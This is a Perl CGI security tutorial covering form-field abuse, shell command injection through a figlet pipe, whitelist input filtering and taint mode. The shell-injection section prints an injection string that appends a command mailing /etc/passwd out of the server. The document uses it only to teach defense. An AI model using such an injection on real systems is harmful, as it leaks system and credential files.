Writing Secure CGI Scripts

One area often overlooked in CGI programming is security. In this article Pete looks at common flaws in CGI scripts and how to fix them with Perl’s taint mode, by filtering user input and more.

Badly written Perl CGI can not only put your account at risk of being cracked, but it can also expose the whole web server to crackers, which is not something your system administrator will be too pleased about. If a web server is cracked due to your negligence, you will almost certainly have your account removed, and may well be liable for costs incurred due to system downtime, reinstallation etc.

Even the big guns in the computing industry seem to have problems writing secure web scripts (several versions of Microsoft’s IIS ship with example ASP scripts which make it possible to view any file on the web server) – sad, since a few basic precautions can greatly reduce the chances of a script being exploited.

In this article we will be looking at some common flaws in CGI scripts, and how they can be avoided. We’ll learn about Perl’s “taint mode”, the dangers of special characters, and how to filter user input.

First up, some common misconceptions on CGI security…

Why should I care about security?

1) What harm can a cracker do?

As mentioned earlier, insecure CGI puts you and your web server at risk. Frequently, exploits are found in CGI scripts which will email any file on your system to the cracker – this could be credit card details, password files etc.

If a Unix server is compromised, the only guaranteed fix is to reinstall everything from disk. This obviously results in downtime and a lot of hard work for the administrator – don’t be surprised if they take legal action against you as well.

2) I run a web server on my home computer. Only a few friends know it exists, so it will be safe.

Unfortunately, not true. Often crackers will scan entire ranges of IP addresses looking for vulnerable machines. Security through obscurity is not a solution.

3) Why would anyone want to crack my website? I don’t have any enemies.

Your buggy CGI script which you thought nobody would care about could well turn out to be a stepping stone on the way to exploiting the web server. A cracker may not care about your website, but he will certainly care about getting his hands on a fast Unix box.

4) I hear so much about security holes in Unix, luckily my hosting company use Windows NT.

Oh dear. The NT + IIS combination has a notoriously bad track record. NT’s only advantage is that its second-rate networking and lack of proper multi-user support make it less attractive to crackers.

5) I only use well-known paid/free CGI scripts. Surely these are safe?

Again, not necessarily. Many famous CGI scripts have bugs in them, and some have huge gaping holes. Matt’s FormMail script is one such example, although I must stress that the bug was fixed in subsequent versions. Still, I’ve seen many web providers actually recommending the buggy version in their help pages. We’ll come back to the FormMail script a little later: it’s a classic example of flawed CGI security in action.

Hopefully by now you realise the importance of secure CGI (if you did not already). In the remaining sections of this article we’ll look at some common holes and how to patch them.

The Golden Rule of CGI

Never, ever, ever trust user input. This is the key behind writing secure CGI, so chant it like a mantra until it is firmly in your head. Whether accidentally or intentionally, unexpected user input can cause all sorts of havoc in your scripts.
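A minimal sketch of the kind of feedback form and handler in question. The field names name and message, the script path and the build_mail helper are assumptions made for illustration. To keep the sketch runnable without a web server or a mail program, the form fields are passed in as a plain hash and the message is returned rather than sent:

```perl
use strict;
use warnings;

# The HTML form (field names and script path are assumed):
#
#   <form action="/cgi-bin/feedback.cgi" method="post">
#     <input type="hidden" name="to" value="pete@perlcoders.com">
#     Name:    <input type="text" name="name">
#     Message: <textarea name="message"></textarea>
#     <input type="submit">
#   </form>

# Stand-in for the CGI script: in the real thing each value would come
# from $q->param(...) and the result would be piped to a mail program.
sub build_mail {
    my (%form) = @_;
    my $to      = $form{to};
    my $name    = $form{name};
    my $message = $form{message};
    return "To: $to\nSubject: Feedback from $name\n\n$message\n";
}

print build_mail(
    to      => 'pete@perlcoders.com',
    name    => 'A. Visitor',
    message => 'Nice site!',
);
```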

Basic, but you get the general picture: a visitor enters his name and a message. The message then gets emailed onto you. Do you see the problem in the script above? If not, read through it again (it’s flawed thinking, not an actual programming error).

The problem is the hidden input field in the form. At first glance it seems to make sense to set an email address in the form. If your email address changes, or you want to give copies of the script to your friends, it is a lot easier to edit an HTML field than it is to edit a CGI script.

But that’s forgetting our golden rule: never trust user input. All the cunning cracker has to do is view the source code of your HTML page and copy/paste it into his own HTML page. He can then change the email address in the form to anything he likes. Next, he loads his modified copy of the form in his web browser, fills in an unpleasant message and sends it to someone he doesn’t like. The email gets sent via your web server, and the recipient will automatically assume it came from you.

Now this alone might not be too bad, but with the aid of some CGI scripting the process can be automated allowing millions of emails to be sent via your script. A spammer’s dreams come true, and unless you can prove otherwise, you’ll end up getting the blame.

The solution is simple enough: rather than having the hidden form field, add a line to the top of the script such as:

$to = "pete\@perlcoders.com";

…and delete the $to = $q->param('to') line. (Note the backslash before the @: inside double quotes Perl would otherwise try to interpolate an array called @perlcoders.)
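Applied to a handler that assembles the message from the form fields, the fix might look like the sketch below. The build_mail helper and the name and message fields are assumptions for illustration; the point is only that the recipient lives in the script and nothing submitted by the visitor can change it:

```perl
use strict;
use warnings;

# Recipient fixed in the script; single quotes avoid having to escape the @.
my $TO = 'pete@perlcoders.com';

sub build_mail {
    my (%form) = @_;
    # Any "to" field a visitor submits is simply never looked at.
    return "To: $TO\nSubject: Feedback from $form{name}\n\n$form{message}\n";
}

# Even a forged form that supplies its own "to" value mails only $TO.
print build_mail(to => 'victim@example.com', name => 'A. Visitor', message => 'Hi');
```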

Simple, and we’ve potentially saved ourselves a lot of trouble. So simple in fact that you may be surprised to learn that a very popular site offering free CGI scripts actually made this mistake. Lots of people who should have known better (including web hosting companies and web designers) still use this script.

It should be noted that the bug was fixed in subsequent versions of the script.

If problems like that don’t bother you, then read on for more CGI horrors.

Shell processing

The biggest problems come with system commands, in particular when Perl has access to a shell. If you have experience with Unix shells such as bash or tcsh, then you’ll know that they offer a huge variety of commands and characters with special meanings. Unexpected user input can create all sorts of strange effects.

Let’s look at an example. Figlet is a popular program for creating fancy ASCII text (you can see my figlet server in action at http://www.p-smith.co.uk/figlet.php3). The basic syntax for using figlet is:

$ figlet 'Hello World'

Type this at the Unix shell, and it prints Hello World in large letters using the default font. Being a CGI scripter, you will no doubt be thinking “wouldn’t it be cool to create a script to take some letters entered by the user, run them through figlet, and send the result back to the web browser”. And indeed it would be cool.
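A minimal sketch of such a script. The figlet_command and figlet_html helper names are assumptions for illustration, and /usr/local/bin/figlet is the path used in the examples in this article. The command string is built in its own function so that it can be inspected without running anything:

```perl
use strict;
use warnings;

my $FIGLET = '/usr/local/bin/figlet';

# Build the shell command by dropping the user's text between double quotes.
sub figlet_command {
    my ($text) = @_;
    return qq{$FIGLET "$text"};
}

# Run the command through a pipe and wrap the output in <pre> tags.
# The command is a single string containing shell characters (the quotes),
# so Perl hands the whole line to the shell to interpret.
sub figlet_html {
    my ($text) = @_;
    open(my $fig, figlet_command($text) . ' |') or die "Cannot run figlet: $!";
    my $banner = join '', <$fig>;
    close $fig;
    return "<pre>\n$banner</pre>\n";
}

# In the CGI script the text would come from the form via $q->param(...).
# Here we only print the command that would be run.
print figlet_command('Hello World'), "\n";
```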

Not a masterpiece of scripting, but simple enough to illustrate my point. We open a pipe to the figlet binary, passing it the text string to display. We then print the result to the user’s browser (adding <pre> tags so that it formats correctly).

Now, we are piping data to an external program, which involves Perl using the shell, and as we have already mentioned, the shell is a strange beast. No problemo if the user sticks to normal text, but what happens if they enter this?

"; mail pete@perlcoders.com </etc/passwd

This is the command that ends up getting executed at the shell:

$ /usr/local/bin/figlet ""; mail pete@perlcoders.com </etc/passwd

This has the effect of running figlet with an empty string (""), which simply prints out nothing. The shell then feeds the passwd file into an email and sends it to me. Experienced shell users will already know that the semicolon allows us to place two commands on one line.

So what do we do about this kind of problem?

Filtering User Input

Obviously some sort of filtering is required. You could make a list of all the characters to disallow, but could you really be sure you’d included everything? A better approach is to specify which characters should be allowed, and reject everything else.

Alphanumerics are fine, as are periods, question marks, exclamation marks, underscores and hyphens. Everything else we reject. A regular expression such as /[^\w.?!-]/ matches any character that is not one of these (\w matches letters, numbers and underscore).

Admittedly this means a trade-off in functionality since the user could not, for example, use apostrophes.
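The whitelist check can be sketched as follows. The is_acceptable name and the sample strings are made up for illustration:

```perl
use strict;
use warnings;

# True only if $text is non-empty and made up solely of the allowed set:
# letters, digits, underscore (\w), period, question mark, exclamation
# mark and hyphen. Anything else, including quotes, spaces and
# semicolons, causes a rejection.
sub is_acceptable {
    my ($text) = @_;
    return 0 unless defined $text && length $text;
    return $text !~ /[^\w.?!-]/ ? 1 : 0;
}

for my $sample ('Hello_World!', 'really?', '"; mail pete@perlcoders.com </etc/passwd') {
    printf "%-45s %s\n", $sample, is_acceptable($sample) ? 'accepted' : 'rejected';
}
```

Because the pattern names what is allowed rather than what is forbidden, a shell character nobody thought of is rejected by default.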

Checking all user input against a regex like this is good practice. Not only does it improve security, but it can also be used to correct the user if they make a mistake. A variable expected to hold the user’s telephone number should only hold numbers (and maybe spaces), so something like:

if ($phoneno !~ /^[\d ]+$/ ) { ……

… would catch any other characters.

For email addresses, we could even go a step further and specify that the address must be in the form of:

something@something.something

Or as a regex,

^.+@.+\..+$
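Both format checks can be wrapped in small helpers. This is only a sketch: the function names are invented here, and the email pattern tests the rough something@something.something shape, not whether the address really exists. The helpers use \z rather than $ as the end anchor, because a plain $ also matches just before a trailing newline:

```perl
use strict;
use warnings;

# Digits and spaces only, at least one character.
sub looks_like_phone {
    my ($phoneno) = @_;
    return 0 unless defined $phoneno;
    return $phoneno =~ /^[\d ]+\z/ ? 1 : 0;
}

# something@something.something, with every part non-empty.
sub looks_like_email {
    my ($address) = @_;
    return 0 unless defined $address;
    return $address =~ /^.+\@.+\..+\z/ ? 1 : 0;
}

print looks_like_phone('01234 567890')    ? "phone ok\n" : "phone rejected\n";
print looks_like_email('pete@perlcoders') ? "email ok\n" : "email rejected\n";
```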

If you aren’t familiar with regular expressions, then take a look at Mitch’s article on PHP and regular expressions here. Just ignore the PHP and you’ll be able to pick up regular expressions in about 10 minutes.

Perl’s Taint Mode

Now, keeping track of user input and remembering to check it can be hard work. In a big program it’s too easy to lose track of data that has been checked and data that has not. Luckily Perl comes to the rescue with its “taint mode”.

Taint keeps track of user input that has not been checked, and will exit with an error if you attempt to do anything ‘unsafe’ with this data. In effect, taint mode protects you from yourself. Let’s look at an example:
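A minimal sketch of such a script, assuming the two names arrive as command-line arguments rather than CGI parameters so that it runs without a web server. The taint_report helper is made up for illustration, while tainted comes from the core Scalar::Util module. In a CGI script the flag would sit on the first line as #!/usr/bin/perl -T, while here it is given on the command line:

```perl
# Run as:  perl -T taint_demo.pl Pete Smith
use strict;
use warnings;
use Scalar::Util qw(tainted);

# Under -T, command-line arguments count as outside input,
# just as CGI parameters do.
my ($firstname, $surname) = @ARGV;
$firstname = '' unless defined $firstname;
$surname   = '' unless defined $surname;

# Taintedness follows the data into any value derived from it.
my $fullname = "$firstname $surname";

# Describe whether Perl currently regards a value as tainted.
sub taint_report {
    my ($label, $value) = @_;
    return sprintf "%-10s %s", $label, tainted($value) ? 'tainted' : 'not tainted';
}

print taint_report('firstname', $firstname), "\n";
print taint_report('surname',   $surname),   "\n";
print taint_report('fullname',  $fullname),  "\n";
```

Run without -T, nothing is ever marked as tainted, so all three lines report "not tainted".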

The first thing you’ll notice here is the -T flag: this turns taint mode on, in the same way that -w turns warnings on. Hopefully you’ve realised that since $firstname and $surname contain user input, they are considered tainted by Perl. Any attempt to use these variables unsafely will cause the script to die.

What you may not have realised is that the variable $fullname is also tainted. Perl keeps track of tainted data for you, and that tainted-ness will follow the variable if it is assigned to another variable.

It’s interesting to note what Perl considers to be an unsafe action. Generally, any attempt to pass tainted data directly to a shell via a pipe is unsafe. If you constructed a filename based on user input, it would be legal to open this file read only, but opening it for writing would cause an error. (This is an interesting point: even though taint considers it acceptable, you certainly don’t want to allow unchecked data to be used as the basis of a filename.)

Now taint mode is rather restrictive, and unless there was a way to ‘untaint’ data, you would have a hard time doing anything useful in Perl.

Untainting data

As we’ve already seen, tainted-ness follows a variable, even if its value is assigned to another variable. There is, however, one way to untaint data: by matching with a regex.

$something =~ /^([\w.]+)$/; $cleanvariable = $1;

Here we specify that $something must contain only letters, numbers, underscores or periods. The ^ and $ anchor the pattern to the start and end of the string, so every character in $something has to be one of these.

We’ve also wrapped the [\w.]+ in parentheses, allowing us to make use of the $1, $2, $3 etc shortcuts. In our example $1 contains the whole value of $something (assuming it *did* only contain letters, numbers, underscores or periods).

We can shorten this a little further…

($cleanvariable) = $something =~ /^([\w.]+)$/;

… since in list context the match returns the captured groups ($1, $2, $3 etc) as a list.
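Wrapped in a helper, the same idea might look like the sketch below. The untaint name and the sample value are assumptions for illustration. The list-context form matters here: if a match fails, $1 is not reset and may still hold the result of an earlier successful match, whereas the list assignment simply leaves the variable undefined:

```perl
use strict;
use warnings;

# Return the untainted match if $value is made up of letters, digits,
# underscores and periods; return undef if the pattern does not match.
sub untaint {
    my ($value) = @_;
    return undef unless defined $value;
    my ($clean) = $value =~ /^([\w.]+)$/;   # captures, or empty list on failure
    return $clean;
}

my $cleanvariable = untaint('guestbook.txt');
die "unexpected characters in input\n" unless defined $cleanvariable;
print "$cleanvariable\n";
```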

The beauty of taint is that it considers all user input to be unsafe by default, but easily allows us to untaint a variable using a simple regex. Forcing us to perform a pattern match on the variable stops lazy habits from putting our security at risk, and makes us think a little more carefully about just what we expect to find in that data: even though it is not a security risk, it is still good practice to reject a telephone number if it contains letters.

At first you will find taint mode rather frustrating, since your script will die for so many extra reasons, but after a while you will find it second nature to think secure, and your scripts will be a lot better for it.